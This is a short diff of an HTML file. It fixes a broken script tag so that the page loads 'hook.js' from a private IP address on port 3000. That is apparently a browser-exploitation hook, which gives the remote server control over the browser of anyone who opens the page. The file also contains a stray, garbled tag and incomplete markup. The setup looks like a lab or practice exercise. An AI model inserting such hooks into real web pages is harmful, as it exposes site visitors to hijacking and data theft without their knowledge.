--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <head>
-    <script> src="http://<10.0.2.15>:3000/hook.js"</script>
+    <script src="http://<10.0.2.15>:3000/hook.js"></script>
     <body>
 
        <sr>gejsi</sr> 
